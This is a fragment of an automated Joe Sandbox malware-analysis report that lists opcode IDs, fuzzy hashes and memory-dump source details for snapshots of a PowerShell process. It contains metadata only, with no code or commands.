                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c964c5c8bb761c1e4504e3de2ce1799f4b544dea48dcbd10b654676265737deb
                                                                                                                                • Instruction ID: aacd66a68ff9dff0a1828c4ee810b226f7c4d9a67101c8a396ab5f5f646fa306
                                                                                                                                • Opcode Fuzzy Hash: c964c5c8bb761c1e4504e3de2ce1799f4b544dea48dcbd10b654676265737deb
                                                                                                                                • Instruction Fuzzy Hash: 59023A32B08A494FEB94DF1CC4A5AE97BE0FF56310F15017AC449C729ADE68AC42D781
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 57529ac3ae77b9db8429a7ded0521f9de8876915f6fc913f64d1ad84f61406a6
                                                                                                                                • Instruction ID: 6b7c1e03b75780a642027bbedf731e48b2639fbf8bf2d98f6c8d4a6037f10f5a
                                                                                                                                • Opcode Fuzzy Hash: 57529ac3ae77b9db8429a7ded0521f9de8876915f6fc913f64d1ad84f61406a6
                                                                                                                                • Instruction Fuzzy Hash: 6F91A467B0D7D21BE7229B6CA8F15D63F90FF8322570A00B3C6C4CE097AD5D284B9261
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e6629b9e5dbc047aa849a2bc9a8ab30a4510e6550af6e45b9fc7d6b797bb1827
                                                                                                                                • Instruction ID: 6937ed6c060821834ba23531fc0df859f18e7e714edac9025eb44a6286275af8
                                                                                                                                • Opcode Fuzzy Hash: e6629b9e5dbc047aa849a2bc9a8ab30a4510e6550af6e45b9fc7d6b797bb1827
                                                                                                                                • Instruction Fuzzy Hash: 3B519A57B0D7821FF752563898BA1DB3BE4FF9322470B10B7C684CA097ED5E2C069662